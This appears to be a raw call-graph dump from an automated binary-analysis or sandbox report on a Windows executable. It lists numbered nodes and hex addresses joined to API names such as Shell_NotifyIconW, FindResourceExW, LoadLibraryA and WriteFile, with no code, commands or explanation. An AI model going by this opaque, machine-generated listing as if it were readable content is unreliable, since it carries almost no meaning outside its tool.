91896->91898 91899 d74aaf 22 API calls 91897->91899 91898->91873 91900 d749a3 91898->91900 91902 db3972 91899->91902 91901 d949b8 _strftime 40 API calls 91900->91901 91903 d749ae 91901->91903 91903->91878 91904 d749b8 91903->91904 91905 d949b8 _strftime 40 API calls 91904->91905 91906 d749c3 91905->91906 91907 d74a07 91906->91907 91909 d74aaf 22 API calls 91906->91909 91907->91891 91908 d74a13 91907->91908 91908->91902 92060 d77d93 91908->92060 91911 d749ea 91909->91911 91913 d7c1c3 22 API calls 91911->91913 91915 d749f8 91913->91915 91917 d74aaf 22 API calls 91915->91917 91917->91907 91919 d7890f 22 API calls 91921 d74a4c 91919->91921 91920 d78a30 23 API calls 91920->91921 91921->91919 91921->91920 91922 d74a90 91921->91922 91923 d74aaf 22 API calls 91921->91923 91922->91789 91923->91921 91925 d7481b __wsopen_s 91924->91925 91926 d74834 91925->91926 91927 db380d ___scrt_fastfail 91925->91927 92535 d7592d 91926->92535 91930 db3829 GetOpenFileNameW 91927->91930 91932 db3878 91930->91932 91933 d784e7 22 API calls 91932->91933 91935 db388d 91933->91935 91935->91935 91937 d74852 92563 d76328 91937->92563 91941 d784f7 _wcslen 91940->91941 91942 db5777 91940->91942 91945 d78532 91941->91945 91946 d7850d 91941->91946 91943 d7ad22 22 API calls 91942->91943 91944 db5780 91943->91944 91944->91944 91948 d8fd5b 22 API calls 91945->91948 92834 d788bb 22 API calls 91946->92834 91950 d7853e 91948->91950 91949 d78515 __fread_nolock 91949->91799 91951 d8fd8b 22 API calls 91950->91951 91951->91949 91953 d73708 __wsopen_s 91952->91953 92835 d75ce6 91953->92835 91955 d7370d 91956 d73787 91955->91956 92846 d73c08 82 API calls 91955->92846 91956->91800 91958 d7371a 91958->91956 92847 d73a6d 84 API calls 91958->92847 91960 d73723 91960->91956 91961 d73727 GetFullPathNameW 91960->91961 91962 d784e7 22 API calls 91961->91962 91963 d73753 91962->91963 91964 d784e7 22 API calls 91963->91964 91965 d73760 91964->91965 91966 db3323 91965->91966 91967 d784e7 22 API calls 91965->91967 91967->91956 92852 d746ff 7 API calls 91968->92852 91970 d74555 91971 d7468e CreateWindowExW CreateWindowExW ShowWindow ShowWindow 91970->91971 91971->91811 91973 d756ed ___scrt_fastfail 91972->91973 92853 d76092 91973->92853 91975 d75773 91978 db40bd Shell_NotifyIconW 91975->91978 91979 d75791 Shell_NotifyIconW 91975->91979 92857 d757ae 91979->92857 91981 d757a7 91981->91817 91982->91818 91983->91800 91984->91807 91986 db1ef0 __wsopen_s 91985->91986 91987 d758f2 GetModuleFileNameW 91986->91987 91988 d7b606 22 API calls 91987->91988 91989 d75918 91988->91989 91990 d7592d 23 API calls 91989->91990 91991 d75922 91990->91991 91991->91813 91993 db3e1a 91992->91993 91994 d752ce 91992->91994 91996 d8fd5b 22 API calls 91993->91996 92885 d752df 91994->92885 91998 db3e24 _wcslen 91996->91998 91997 d752d9 91997->91829 91999 d8fd8b 22 API calls 91998->91999 92000 db3e5d __fread_nolock 91999->92000 92002 d76492 __wsopen_s 92001->92002 92003 d784e7 22 API calls 92002->92003 92004 d764c4 92002->92004 92003->92004 92008 d764fa 92004->92008 92114 d7660f 92004->92114 92006 d765cb 92007 d76600 92006->92007 92009 d7b606 22 API calls 92006->92009 92007->91849 92008->92006 92010 d7b606 22 API calls 92008->92010 92013 d7660f 22 API calls 92008->92013 92117 d76aff 92008->92117 92011 d765f4 92009->92011 92010->92008 92012 d76aff 22 API calls 92011->92012 92012->92007 92013->92008 92129 d76832 LoadLibraryA 92015->92129 92020 db487c 92023 d768db 68 API calls 92020->92023 92021 d76898 LoadLibraryExW 92137 d767fb LoadLibraryA 92021->92137 92025 db4883 92023->92025 92027 d767fb 3 API calls 92025->92027 92028 db488b 92027->92028 92159 d76a95 92028->92159 92029 d768c2 92029->92028 92030 d768ce 92029->92030 92032 d768db 68 API calls 92030->92032 92034 d748d0 92032->92034 92034->91856 92034->91857 92036 db48b2 92038 d8fd5b 22 API calls 92037->92038 92039 d748fa 92038->92039 92039->91868 92041 d7c122 92040->92041 92042 d7c151 92041->92042 92293 d7c28f 41 API calls 92041->92293 92042->91872 92045 d74ad7 92044->92045 92046 d74ab9 92044->92046 92048 d784e7 22 API calls 92045->92048 92047 d74976 92046->92047 92049 d7c1c3 22 API calls 92046->92049 92050 d949b8 92047->92050 92048->92047 92049->92047 92051 d94a3b 92050->92051 92052 d949c6 92050->92052 92296 d94a4d 40 API calls 2 library calls 92051->92296 92059 d949eb 92052->92059 92294 d9f269 20 API calls _abort 92052->92294 92055 d94a48 92055->91893 92056 d949d2 92295 da277c 26 API calls _strftime 92056->92295 92058 d949dd 92058->91893 92059->91893 92061 d77d9b 92060->92061 92062 d8fd5b 22 API calls 92061->92062 92063 d77da9 92062->92063 92297 d783b0 92063->92297 92066 d783e0 92300 d7c910 92066->92300 92068 d783f0 92069 d8fd8b 22 API calls 92068->92069 92070 d74a31 92068->92070 92069->92070 92071 d78a30 92070->92071 92072 d78a46 92071->92072 92073 db58e4 92072->92073 92079 d78a50 92072->92079 92309 d721a5 22 API calls 92073->92309 92074 db58f1 92310 d7c5e7 23 API calls messages 92074->92310 92077 db590f 92077->92077 92078 d78b64 92080 d8fd5b 22 API calls 92078->92080 92079->92074 92079->92078 92081 d78b6b 92079->92081 92080->92081 92081->91921 92083 de2c33 92082->92083 92084 d76abf 64 API calls 92083->92084 92085 de2c47 92084->92085 92311 de2d84 92085->92311 92088 de2c5d 92088->91859 92089 d76a95 40 API calls 92090 de2c74 92089->92090 92091 d76a95 40 API calls 92090->92091 92092 de2c84 92091->92092 92093 d76a95 40 API calls 92092->92093 92094 de2c9f 92093->92094 92095 d76a95 40 API calls 92094->92095 92096 de2cba 92095->92096 92097 d76abf 64 API calls 92096->92097 92098 de2cd1 92097->92098 92099 d9e99c ___std_exception_copy 21 API calls 92098->92099 92100 de2cd8 92099->92100 92101 d9e99c ___std_exception_copy 21 API calls 92100->92101 92102 de2ce2 92101->92102 92103 d76a95 40 API calls 92102->92103 92104 de2cf6 92103->92104 92105 de281c 27 API calls 92104->92105 92106 de2d0c 92105->92106 92106->92088 92317 de21ec 79 API calls 92106->92317 92109 d768e5 92108->92109 92110 d768ec 92108->92110 92318 d9e608 92109->92318 92112 d7690c FreeLibrary 92110->92112 92113 d768fb 92110->92113 92112->92113 92113->91861 92123 d7c7c9 92114->92123 92116 d7661a 92116->92004 92119 d76b0e 92117->92119 92122 d76b2f __fread_nolock 92117->92122 92118 d8fd5b 22 API calls 92120 d76b42 92118->92120 92121 d8fd8b 22 API calls 92119->92121 92120->92008 92121->92122 92122->92118 92124 d7c7dc 92123->92124 92125 d7c7d9 __fread_nolock 92123->92125 92126 d8fd5b 22 API calls 92124->92126 92125->92116 92127 d7c7e7 92126->92127 92128 d8fd8b 22 API calls 92127->92128 92128->92125 92130 d7684a GetProcAddress 92129->92130 92131 d76868 92129->92131 92132 d7685a 92130->92132 92134 d9e57b 92131->92134 92132->92131 92133 d76861 FreeLibrary 92132->92133 92133->92131 92167 d9e4ba 92134->92167 92136 d7688c 92136->92020 92136->92021 92138 d76810 GetProcAddress 92137->92138 92139 d7682f 92137->92139 92140 d76820 92138->92140 92142 d76920 92139->92142 92140->92139 92141 d76828 FreeLibrary 92140->92141 92141->92139 92143 d8fd8b 22 API calls 92142->92143 92144 d76935 92143->92144 92219 d770c2 92144->92219 92146 d76941 __fread_nolock 92147 db48ca 92146->92147 92148 d76a45 92146->92148 92158 d7697c 92146->92158 92233 de2f6b 74 API calls 92147->92233 92222 d76122 CreateStreamOnHGlobal 92148->92222 92151 db48cf 92153 d76abf 64 API calls 92151->92153 92152 d76a95 40 API calls 92152->92158 92154 db48f2 92153->92154 92155 d76a95 40 API calls 92154->92155 92157 d76a0e messages 92155->92157 92157->92029 92158->92151 92158->92152 92158->92157 92228 d76abf 92158->92228 92160 d76aa7 92159->92160 92161 db491d 92159->92161 92255 d9e854 92160->92255 92164 de281c 92276 de266c 92164->92276 92166 de2837 92166->92036 92170 d9e4c6 ___scrt_is_nonwritable_in_current_image 92167->92170 92168 d9e4d4 92192 d9f269 20 API calls _abort 92168->92192 92170->92168 92172 d9e504 92170->92172 92171 d9e4d9 92193 da277c 26 API calls _strftime 92171->92193 92174 d9e509 92172->92174 92175 d9e516 92172->92175 92194 d9f269 20 API calls _abort 92174->92194 92184 da8001 92175->92184 92178 d9e51f 92179 d9e532 92178->92179 92180 d9e525 92178->92180 92196 d9e564 LeaveCriticalSection __fread_nolock 92179->92196 92195 d9f269 20 API calls _abort 92180->92195 92181 d9e4e4 __fread_nolock 92181->92136 92185 da800d ___scrt_is_nonwritable_in_current_image 92184->92185 92197 da2eee EnterCriticalSection 92185->92197 92187 da801b 92198 da809b 92187->92198 92191 da804c __fread_nolock 92191->92178 92192->92171 92193->92181 92194->92181 92195->92181 92196->92181 92197->92187 92206 da80be 92198->92206 92199 da8117 92200 da4c0d _abort 20 API calls 92199->92200 92201 da8120 92200->92201 92203 da2958 _free 20 API calls 92201->92203 92204 da8129 92203->92204 92205 da8028 92204->92205 92216 da3395 11 API calls 2 library calls 92204->92216 92211 da8057 92205->92211 92206->92199 92206->92205 92214 d9911d EnterCriticalSection 92206->92214 92215 d99131 LeaveCriticalSection 92206->92215 92209 da8148 92217 d9911d EnterCriticalSection 92209->92217 92218 da2f36 LeaveCriticalSection 92211->92218 92213 da805e 92213->92191 92214->92206 92215->92206 92216->92209 92217->92205 92218->92213 92220 d8fd5b 22 API calls 92219->92220 92221 d770d4 92220->92221 92221->92146 92223 d7613c FindResourceExW 92222->92223 92227 d76159 92222->92227 92224 db42f1 LoadResource 92223->92224 92223->92227 92225 db4306 SizeofResource 92224->92225 92224->92227 92226 db431a LockResource 92225->92226 92225->92227 92226->92227 92227->92158 92229 db493d 92228->92229 92230 d76ace 92228->92230 92234 d9ec73 92230->92234 92233->92151 92237 d9ea3a 92234->92237 92236 d76adc 92236->92158 92238 d9ea46 ___scrt_is_nonwritable_in_current_image 92237->92238 92239 d9ea52 92238->92239 92241 d9ea78 92238->92241 92250 d9f269 20 API calls _abort 92239->92250 92252 d9911d EnterCriticalSection 92241->92252 92242 d9ea57 92251 da277c 26 API calls _strftime 92242->92251 92245 d9ea84 92253 d9eb9a 62 API calls 2 library calls 92245->92253 92247 d9ea98 92254 d9eab7 LeaveCriticalSection __fread_nolock 92247->92254 92249 d9ea62 __fread_nolock 92249->92236 92250->92242 92251->92249 92252->92245 92253->92247 92254->92249 92258 d9e871 92255->92258 92257 d76ab8 92257->92164 92259 d9e87d ___scrt_is_nonwritable_in_current_image 92258->92259 92260 d9e8bd 92259->92260 92261 d9e890 ___scrt_fastfail 92259->92261 92262 d9e8b5 __fread_nolock 92259->92262 92273 d9911d EnterCriticalSection 92260->92273 92271 d9f269 20 API calls _abort 92261->92271 92262->92257 92264 d9e8c7 92274 d9e688 38 API calls 4 library calls 92264->92274 92267 d9e8aa 92272 da277c 26 API calls _strftime 92267->92272 92268 d9e8de 92275 d9e8fc LeaveCriticalSection __fread_nolock 92268->92275 92271->92267 92272->92262 92273->92264 92274->92268 92275->92262 92279 d9e478 92276->92279 92278 de267b 92278->92166 92282 d9e3f9 92279->92282 92281 d9e495 92281->92278 92283 d9e408 92282->92283 92284 d9e41c 92282->92284 92290 d9f269 20 API calls _abort 92283->92290 92289 d9e418 __alldvrm 92284->92289 92292 da32cf 11 API calls 2 library calls 92284->92292 92286 d9e40d 92291 da277c 26 API calls _strftime 92286->92291 92289->92281 92290->92286 92291->92289 92292->92289 92293->92042 92294->92056 92295->92058 92296->92055 92298 d8fd5b 22 API calls 92297->92298 92299 d74a23 92298->92299 92299->92066 92301 d7c91b 92300->92301 92302 dc0728 92301->92302 92307 d7c923 messages 92301->92307 92303 d8fd5b 22 API calls 92302->92303 92304 dc0734 92303->92304 92305 d7c92a 92305->92068 92307->92305 92308 d7c990 22 API calls messages 92307->92308 92308->92307 92309->92074 92310->92077 92316 de2d98 92311->92316 92312 d76a95 40 API calls 92312->92316 92313 de2c59 92313->92088 92313->92089 92314 de281c 27 API calls 92314->92316 92315 d76abf 64 API calls 92315->92316 92316->92312 92316->92313 92316->92314 92316->92315 92317->92088 92319 d9e614 ___scrt_is_nonwritable_in_current_image 92318->92319 92320 d9e63a 92319->92320 92321 d9e625 92319->92321 92330 d9e635 __fread_nolock 92320->92330 92331 d9911d EnterCriticalSection 92320->92331 92348 d9f269 20 API calls _abort 92321->92348 92323 d9e62a 92349 da277c 26 API calls _strftime 92323->92349 92326 d9e656 92332 d9e592 92326->92332 92328 d9e661 92350 d9e67e LeaveCriticalSection __fread_nolock 92328->92350 92330->92110 92331->92326 92333 d9e59f 92332->92333 92334 d9e5b4 92332->92334 92383 d9f269 20 API calls _abort 92333->92383 92339 d9e5af 92334->92339 92351 d9db9b 92334->92351 92336 d9e5a4 92384 da277c 26 API calls _strftime 92336->92384 92339->92328 92344 d9e5d6 92368 da85cf 92344->92368 92347 da2958 _free 20 API calls 92347->92339 92348->92323 92349->92330 92350->92330 92352 d9dbaf 92351->92352 92353 d9dbb3 92351->92353 92357 da4d0a 92352->92357 92353->92352 92354 d9d8e5 __fread_nolock 26 API calls 92353->92354 92355 d9dbd3 92354->92355 92385 da594e 92355->92385 92358 da4d20 92357->92358 92359 d9e5d0 92357->92359 92358->92359 92360 da2958 _free 20 API calls 92358->92360 92361 d9d8e5 92359->92361 92360->92359 92362 d9d8f1 92361->92362 92363 d9d906 92361->92363 92496 d9f269 20 API calls _abort 92362->92496 92363->92344 92365 d9d8f6 92497 da277c 26 API calls _strftime 92365->92497 92367 d9d901 92367->92344 92369 da85de 92368->92369 92370 da85f3 92368->92370 92501 d9f256 20 API calls _abort 92369->92501 92372 da862e 92370->92372 92376 da861a 92370->92376 92503 d9f256 20 API calls _abort 92372->92503 92373 da85e3 92502 d9f269 20 API calls _abort 92373->92502 92498 da85a7 92376->92498 92377 da8633 92504 d9f269 20 API calls _abort 92377->92504 92380 da863b 92505 da277c 26 API calls _strftime 92380->92505 92381 d9e5dc 92381->92339 92381->92347 92383->92336 92384->92339 92386 da595a ___scrt_is_nonwritable_in_current_image 92385->92386 92387 da597a 92386->92387 92388 da5962 92386->92388 92389 da5a18 92387->92389 92394 da59af 92387->92394 92464 d9f256 20 API calls _abort 92388->92464 92469 d9f256 20 API calls _abort 92389->92469 92392 da5967 92465 d9f269 20 API calls _abort 92392->92465 92393 da5a1d 92470 d9f269 20 API calls _abort 92393->92470 92410 da50d7 EnterCriticalSection 92394->92410 92398 da5a25 92471 da277c 26 API calls _strftime 92398->92471 92399 da59b5 92401 da59d1 92399->92401 92402 da59e6 92399->92402 92466 d9f269 20 API calls _abort 92401->92466 92411 da5a39 92402->92411 92405 da59d6 92467 d9f256 20 API calls _abort 92405->92467 92406 da596f __fread_nolock 92406->92352 92407 da59e1 92468 da5a10 LeaveCriticalSection __wsopen_s 92407->92468 92410->92399 92412 da5a67 92411->92412 92452 da5a60 92411->92452 92413 da5a8a 92412->92413 92414 da5a6b 92412->92414 92417 da5adb 92413->92417 92418 da5abe 92413->92418 92479 d9f256 20 API calls _abort 92414->92479 92415 d90a0c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 92419 da5c41 92415->92419 92422 da5af1 92417->92422 92485 da93c4 28 API calls __fread_nolock 92417->92485 92482 d9f256 20 API calls _abort 92418->92482 92419->92407 92420 da5a70 92480 d9f269 20 API calls _abort 92420->92480 92472 da55de 92422->92472 92425 da5ac3 92483 d9f269 20 API calls _abort 92425->92483 92427 da5a77 92481 da277c 26 API calls _strftime 92427->92481 92431 da5b38 92437 da5b4c 92431->92437 92438 da5b92 WriteFile 92431->92438 92432 da5aff 92434 da5b03 92432->92434 92435 da5b25 92432->92435 92433 da5acb 92484 da277c 26 API calls _strftime 92433->92484 92439 da5bf9 92434->92439 92486 da5571 GetLastError WriteConsoleW CreateFileW __wsopen_s 92434->92486 92487 da53be 45 API calls 3 library calls 92435->92487 92442 da5b82 92437->92442 92443 da5b54 92437->92443 92441 da5bb5 GetLastError 92438->92441 92448 da5b1b 92438->92448 92439->92452 92494 d9f269 20 API calls _abort 92439->92494 92441->92448 92490 da5654 7 API calls 2 library calls 92442->92490 92444 da5b59 92443->92444 92445 da5b72 92443->92445 92444->92439 92449 da5b62 92444->92449 92489 da5821 8 API calls 2 library calls 92445->92489 92448->92439 92448->92452 92456 da5bd5 92448->92456 92488 da5733 7 API calls 2 library calls 92449->92488 92451 da5b70 92451->92448 92452->92415 92455 da5c1e 92495 d9f256 20 API calls _abort 92455->92495 92457 da5bdc 92456->92457 92458 da5bf0 92456->92458 92491 d9f269 20 API calls _abort 92457->92491 92493 d9f233 20 API calls __dosmaperr 92458->92493 92462 da5be1 92492 d9f256 20 API calls _abort 92462->92492 92464->92392 92465->92406 92466->92405 92467->92407 92468->92406 92469->92393 92470->92398 92471->92406 92473 daf83c __fread_nolock 26 API calls 92472->92473 92475 da55ee 92473->92475 92474 da55f3 92474->92431 92474->92432 92475->92474 92476 da2d04 _abort 38 API calls 92475->92476 92477 da5616 92476->92477 92477->92474 92478 da5634 GetConsoleMode 92477->92478 92478->92474 92479->92420 92480->92427 92481->92452 92482->92425 92483->92433 92484->92452 92485->92422 92486->92448 92487->92448 92488->92451 92489->92451 92490->92451 92491->92462 92492->92452 92493->92452 92494->92455 92495->92452 92496->92365 92497->92367 92506 da8525 92498->92506 92500 da85cb 92500->92381 92501->92373 92502->92381 92503->92377 92504->92380 92505->92381 92507 da8531 ___scrt_is_nonwritable_in_current_image 92506->92507 92517 da50d7 EnterCriticalSection 92507->92517 92509 da853f 92510 da8571 92509->92510 92511 da8566 92509->92511 92533 d9f269 20 API calls _abort 92510->92533 92518 da864e 92511->92518 92514 da856c 92534 da859b LeaveCriticalSection __wsopen_s 92514->92534 92516 da858e __fread_nolock 92516->92500 92517->92509 92519 da5354 __wsopen_s 26 API calls 92518->92519 92522 da865e 92519->92522 92520 da8664 92521 da52c3 __wsopen_s 21 API calls 92520->92521 92524 da86bc 92521->92524 92522->92520 92523 da8696 92522->92523 92525 da5354 __wsopen_s 26 API calls 92522->92525 92523->92520 92526 da5354 __wsopen_s 26 API calls 92523->92526 92527 da86de 92524->92527 92530 d9f233 __dosmaperr 20 API calls 92524->92530 92528 da868d 92525->92528 92529 da86a2 CloseHandle 92526->92529 92527->92514 92531 da5354 __wsopen_s 26 API calls 92528->92531 92529->92520 92532 da86ae GetLastError 92529->92532 92530->92527 92531->92523 92532->92520 92533->92514 92534->92516 92593 db1ef0 92535->92593 92538 d75974 92599 d7bfbf 92538->92599 92539 d75959 92540 d784e7 22 API calls 92539->92540 92542 d75965 92540->92542 92595 d7562b 92542->92595 92545 d747d0 92546 db1ef0 __wsopen_s 92545->92546 92547 d747dd GetLongPathNameW 92546->92547 92548 d784e7 22 API calls 92547->92548 92549 d74805 92548->92549 92550 d75489 92549->92550 92551 d7c25d 22 API calls 92550->92551 92552 d7549b 92551->92552 92553 d7592d 23 API calls 92552->92553 92554 d754a6 92553->92554 92555 db404a 92554->92555 92556 d754b1 92554->92556 92560 db406c 92555->92560 92615 d8d5dc 41 API calls 92555->92615 92558 d76aff 22 API calls 92556->92558 92559 d754bd 92558->92559 92609 d7285a 92559->92609 92562 d754d0 92562->91937 92564 d7686d 94 API calls 92563->92564 92565 d7634d 92564->92565 92566 db456a 92565->92566 92568 d7686d 94 API calls 92565->92568 92567 de2c17 80 API calls 92566->92567 92569 db457f 92567->92569 92570 d76361 92568->92570 92571 db4583 92569->92571 92572 db45a0 92569->92572 92570->92566 92573 d76369 92570->92573 92574 d768db 68 API calls 92571->92574 92575 d8fd8b 22 API calls 92572->92575 92576 db458b 92573->92576 92577 d76375 92573->92577 92574->92576 92583 db45e5 92575->92583 92719 ddd978 82 API calls 92576->92719 92616 d7ad7c 92577->92616 92580 d744e2 92580->91797 92580->91800 92581 db4599 92581->92572 92582 db4796 92585 db479e 92582->92585 92583->92582 92583->92585 92590 d7b606 22 API calls 92583->92590 92720 dd959c 22 API calls __fread_nolock 92583->92720 92721 dd94cb 42 API calls _wcslen 92583->92721 92722 de0a78 22 API calls 92583->92722 92723 d7bd9d 22 API calls __fread_nolock 92583->92723 92724 d75e82 22 API calls 92583->92724 92584 d768db 68 API calls 92584->92585 92585->92584 92725 dd97b9 82 API calls __wsopen_s 92585->92725 92590->92583 92594 d7593a GetFullPathNameW 92593->92594 92594->92538 92594->92539 92596 d75639 92595->92596 92605 d7ad22 92596->92605 92598 d7483d 92598->92545 92600 d7bfcc 92599->92600 92601 d7bfd9 92599->92601 92600->92542 92602 d8fd5b 22 API calls 92601->92602 92603 d7bfe3 92602->92603 92604 d8fd8b 22 API calls 92603->92604 92604->92600 92606 d7ad30 92605->92606 92608 d7ad39 __fread_nolock 92605->92608 92607 d7c7c9 22 API calls 92606->92607 92606->92608 92607->92608 92608->92598 92610 d7286c 92609->92610 92614 d7288b __fread_nolock 92609->92614 92613 d8fd8b 22 API calls 92610->92613 92611 d8fd5b 22 API calls 92612 d728a2 92611->92612 92612->92562 92613->92614 92614->92611 92615->92555 92617 d7ada5 92616->92617 92618 dbf9b1 92616->92618 92619 d8fd8b 22 API calls 92617->92619 92796 dd97b9 82 API calls __wsopen_s 92618->92796 92621 d7adc9 92619->92621 92622 d77bee CloseHandle 92621->92622 92623 d7add7 92622->92623 92624 d7c25d 22 API calls 92623->92624 92627 d7ade0 92624->92627 92625 d7ae3d 92629 d7c25d 22 API calls 92625->92629 92626 d7ae2f 92626->92625 92628 dbf9cb 92626->92628 92797 ddcc1d SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 92626->92797 92630 d77bee CloseHandle 92627->92630 92628->92625 92628->92626 92631 d7ae49 92629->92631 92633 d7ade9 92630->92633 92726 d8f962 92631->92726 92636 d77bee CloseHandle 92633->92636 92635 dbfa27 92635->92625 92638 d7adf2 92636->92638 92744 d770e5 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 92638->92744 92639 d7c25d 22 API calls 92642 d7ae61 92639->92642 92641 d7ae0c 92643 d7ae14 92641->92643 92644 dbfde7 92641->92644 92645 d7592d 23 API calls 92642->92645 92745 d76d7e 27 API calls messages 92643->92745 92810 dd97b9 82 API calls __wsopen_s 92644->92810 92646 d7ae6f 92645->92646 92731 d8f945 92646->92731 92648 dbfdfc 92648->92648 92653 d7ae26 92746 d76d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 92653->92746 92656 d7aeb2 92657 d7c25d 22 API calls 92656->92657 92659 d7aebb 92657->92659 92658 dbfa3d 92660 d77bee CloseHandle 92658->92660 92662 d7c25d 22 API calls 92659->92662 92661 dbfa46 92660->92661 92663 d7686d 94 API calls 92661->92663 92664 d7aec4 92662->92664 92665 dbfa6e 92663->92665 92747 d76bff 92664->92747 92667 dbfd7e 92665->92667 92670 de2c17 80 API calls 92665->92670 92807 dd97b9 82 API calls __wsopen_s 92667->92807 92668 d7aedb 92671 d77cf8 22 API calls 92668->92671 92672 dbfa91 92670->92672 92673 d7aeec SetCurrentDirectoryW 92671->92673 92674 d768db 68 API calls 92672->92674 92677 d7aeff 92673->92677 92675 dbfa9f 92674->92675 92675->92667 92676 dbfaa7 92675->92676 92678 d8fd5b 22 API calls 92676->92678 92679 d8fd8b 22 API calls 92677->92679 92680 dbfacf 92678->92680 92682 d7af12 92679->92682 92798 d7bd9d 22 API calls __fread_nolock 92680->92798 92684 d770c2 22 API calls 92682->92684 92683 d7b08a 92686 d77bee CloseHandle 92683->92686 92714 d7af1d _wcslen 92684->92714 92690 d7b09c 92686->92690 92687 d7b035 92688 dbfceb 92804 de09ea 22 API calls 92688->92804 92690->92580 92695 dbfd11 92805 dd40c5 22 API calls __fread_nolock 92695->92805 92699 dbfdca 92704 d7b058 messages 92740 d77bee 92704->92740 92708 d7b606 22 API calls 92708->92714 92709 d7b606 22 API calls 92716 dbfb10 92709->92716 92713 dbfd53 92806 dd97b9 82 API calls __wsopen_s 92713->92806 92714->92687 92714->92699 92714->92708 92789 d7b0d9 33 API calls 92714->92789 92790 d78fd0 GetStringTypeW 92714->92790 92791 d7901d 40 API calls 92714->92791 92792 d790bd GetStringTypeW _wcslen 92714->92792 92716->92688 92716->92709 92716->92713 92799 dd959c 22 API calls __fread_nolock 92716->92799 92800 dd94cb 42 API calls _wcslen 92716->92800 92801 de0a78 22 API calls 92716->92801 92802 d7bd9d 22 API calls __fread_nolock 92716->92802 92803 d78f2c 22 API calls 92716->92803 92718 dbfd6c 92718->92704 92719->92581 92720->92583 92721->92583 92722->92583 92723->92583 92724->92583 92725->92585 92727 db1ef0 __wsopen_s 92726->92727 92728 d8f96f GetCurrentDirectoryW 92727->92728 92729 d784e7 22 API calls 92728->92729 92730 d7ae55 92729->92730 92730->92639 92811 d7b3b0 92731->92811 92734 d76e66 92739 d76e7d 92734->92739 92735 db4b49 SetFilePointerEx 92736 d76f04 SetFilePointerEx SetFilePointerEx 92738 d76ed0 92736->92738 92737 db4b38 92737->92735 92738->92656 92738->92658 92739->92735 92739->92736 92739->92737 92739->92738 92741 d77c07 92740->92741 92742 d77bf8 92740->92742 92741->92742 92743 d77c0c CloseHandle 92741->92743 92742->92683 92743->92742 92744->92641 92745->92653 92746->92626 92748 d7c25d 22 API calls 92747->92748 92749 d76c15 92748->92749 92750 d7c25d 22 API calls 92749->92750 92751 d76c1d 92750->92751 92752 d7c25d 22 API calls 92751->92752 92753 d76c25 92752->92753 92754 d7c25d 22 API calls 92753->92754 92755 d76c2d 92754->92755 92756 d76c61 92755->92756 92757 db49a2 92755->92757 92759 d786ac 22 API calls 92756->92759 92758 d7c1c3 22 API calls 92757->92758 92760 db49ab 92758->92760 92761 d76c6f 92759->92761 92762 d7bfbf 22 API calls 92760->92762 92763 d7ad22 22 API calls 92761->92763 92766 d76ca4 92762->92766 92764 d76c79 92763->92764 92765 d786ac 22 API calls 92764->92765 92764->92766 92770 d76c9a 92765->92770 92767 d76ce9 92766->92767 92768 d76cc5 92766->92768 92784 db49cd 92766->92784 92819 d786ac 92767->92819 92768->92767 92774 d7660f 22 API calls 92768->92774 92772 d7ad22 22 API calls 92770->92772 92771 d76cfa 92773 d76d10 92771->92773 92778 d7c1c3 22 API calls 92771->92778 92772->92766 92775 d76d24 92773->92775 92780 d7c1c3 22 API calls 92773->92780 92776 d76cd2 92774->92776 92779 d76d2f 92775->92779 92782 d7c1c3 22 API calls 92775->92782 92776->92767 92781 d786ac 22 API calls 92776->92781 92777 d784e7 22 API calls 92786 db4a8d 92777->92786 92778->92773 92783 d7c1c3 22 API calls 92779->92783 92787 d76d3a 92779->92787 92780->92775 92781->92767 92782->92779 92783->92787 92784->92777 92785 d7660f 22 API calls 92785->92786 92786->92767 92786->92785 92832 d751ec 22 API calls __fread_nolock 92786->92832 92787->92668 92789->92714 92790->92714 92791->92714 92792->92714 92796->92626 92797->92635 92798->92716 92799->92716 92800->92716 92801->92716 92802->92716 92803->92716 92804->92695 92805->92704 92806->92718 92807->92718 92810->92648 92812 d7b3be 92811->92812 92813 d7b42b 92811->92813 92815 d7ae95 92812->92815 92816 d7b3fc ReadFile 92812->92816 92818 d8e3db SetFilePointerEx 92813->92818 92815->92734 92816->92815 92817 d7b416 92816->92817 92817->92812 92817->92815 92818->92812 92820 d786bb 92819->92820 92821 d78718 92819->92821 92820->92821 92823 d786c6 92820->92823 92822 d7ad22 22 API calls 92821->92822 92829 d786e9 __fread_nolock 92822->92829 92824 d786e1 92823->92824 92825 db5873 92823->92825 92833 d788bb 22 API calls 92824->92833 92826 d8fd5b 22 API calls 92825->92826 92828 db587d 92826->92828 92830 d8fd8b 22 API calls 92828->92830 92829->92771 92831 db58b0 92830->92831 92832->92786 92833->92829 92834->91949 92836 d75d0d 92835->92836 92845 d75e2a 92835->92845 92837 d8fd8b 22 API calls 92836->92837 92836->92845 92839 d75d34 92837->92839 92838 d8fd8b 22 API calls 92843 d75da9 92838->92843 92839->92838 92843->92845 92848 d7b7e0 86 API calls __fread_nolock 92843->92848 92849 d75e82 22 API calls 92843->92849 92850 de0977 22 API calls 92843->92850 92851 d7bd9d 22 API calls __fread_nolock 92843->92851 92845->91955 92846->91958 92847->91960 92848->92843 92849->92843 92850->92843 92851->92843 92852->91970 92854 db42db 92853->92854 92855 d75742 92853->92855 92854->92855 92856 db42e4 DestroyIcon 92854->92856 92855->91975 92879 ddc792 42 API calls _strftime 92855->92879 92856->92855 92858 d757ca 92857->92858 92877 d7589e 92857->92877 92880 d77c18 92858->92880 92861 db40ca LoadStringW 92864 db40e4 92861->92864 92862 d757e5 92863 d784e7 22 API calls 92862->92863 92865 d757fa 92863->92865 92868 d7c1c3 22 API calls 92864->92868 92872 d7581f ___scrt_fastfail 92864->92872 92866 d75807 92865->92866 92867 db4100 92865->92867 92866->92864 92869 d75811 92866->92869 92870 d77cf8 22 API calls 92867->92870 92868->92872 92871 d77cf8 22 API calls 92869->92871 92873 db410e 92870->92873 92871->92872 92875 d75884 Shell_NotifyIconW 92872->92875 92873->92872 92874 d752b7 22 API calls 92873->92874 92876 db4130 92874->92876 92875->92877 92878 d752b7 22 API calls 92876->92878 92877->91981 92878->92872 92879->91975 92881 d8fd8b 22 API calls 92880->92881 92882 d77c3d 92881->92882 92883 d8fd5b 22 API calls 92882->92883 92884 d757d8 92883->92884 92884->92861 92884->92862 92886 d752ef _wcslen 92885->92886 92887 d75302 92886->92887 92888 db3e7c 92886->92888 92889 d7be83 22 API calls 92887->92889 92890 d8fd5b 22 API calls 92888->92890 92891 d7530f __fread_nolock 92889->92891 92892 db3e86 